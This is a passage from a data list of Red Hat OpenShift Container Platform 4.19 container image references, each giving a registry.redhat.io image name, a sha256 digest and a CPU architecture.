"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
